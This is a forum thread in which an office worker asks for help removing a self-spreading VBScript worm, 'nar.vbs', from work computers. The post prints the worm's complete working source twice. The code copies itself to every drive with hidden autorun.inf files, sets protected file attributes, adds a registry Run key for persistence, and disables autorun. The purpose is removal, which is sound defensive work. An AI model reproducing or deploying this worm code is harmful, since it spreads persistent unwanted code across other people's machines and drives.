The new forums will be named Coin Return (based on the most recent vote)! You can check on the status and timeline of the transition to the new forums here.
The Guiding Principles and New Rules document is now in effect.
Help removing a "good" virus
Jarth
Registered User regular
Registered User regular
So a few computers where I work have gotten this stupid "virus" on them. It's basically a vbscript that disables autorun through a combination of copying itself into C: and C:\Windows, and some registry edits (it also copies itself to any usb drive inserted). Our Antivirus software doesn't do anything to it, and attempting to delete the file from C:\Windows doesn't work as it's a protected system file now. I've tried using a DOS boot disk and the WinXP SP2 CD to delete it from the command prompt, but it's not even visible.
From what I can tell, it doesn't do anything malicious itself, but any software that does it's own shit without my intervention is annoying, and we kind of NEED autorun on most of our computers.
So here it is: (spoiler'd for wall of text)
It also creates an autorun.inf on usb drives which simply runs the vbs with:
shellexecute=wscript.exe nar.vbs
Basically, I want to reverse everything this little bastard does, preferably with my own vbscript and an autorun on MY usb drive, so it clears it from any machine i stick it into. I went to Googling about vbscript, but starting with absolutely zero knowledge of it, I didn't make a lot of headway. At the very least, could someone point me to a good in-depth guide to vbs?
From what I can tell, it doesn't do anything malicious itself, but any software that does it's own shit without my intervention is annoying, and we kind of NEED autorun on most of our computers.
So here it is: (spoiler'd for wall of text)
'
>
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1
>
'
>
on error resume next
dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path
set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)
'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If
'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then
autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop
If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If
do while (in_WinDir = 1)
'---Add nar and autorun to each local disk drive excluding floppies--->
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next
'---Edit the registry to disable autorun--->
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
'---Run once every 5 minutes while within the Windows directory--->
wscript.sleep(60000)
loop
'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
>
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1
>
'
>
on error resume next
dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path
set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)
'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If
'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then
autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop
If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If
do while (in_WinDir = 1)
'---Add nar and autorun to each local disk drive excluding floppies--->
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next
'---Edit the registry to disable autorun--->
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
'---Run once every 5 minutes while within the Windows directory--->
wscript.sleep(60000)
loop
'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
It also creates an autorun.inf on usb drives which simply runs the vbs with:
shellexecute=wscript.exe nar.vbs
Basically, I want to reverse everything this little bastard does, preferably with my own vbscript and an autorun on MY usb drive, so it clears it from any machine i stick it into. I went to Googling about vbscript, but starting with absolutely zero knowledge of it, I didn't make a lot of headway. At the very least, could someone point me to a good in-depth guide to vbs?
Jarth on
0
Posts
Starts at the bottom of page 207. It doesn't look like disabling the script will be too hard. That will at least keep it from running.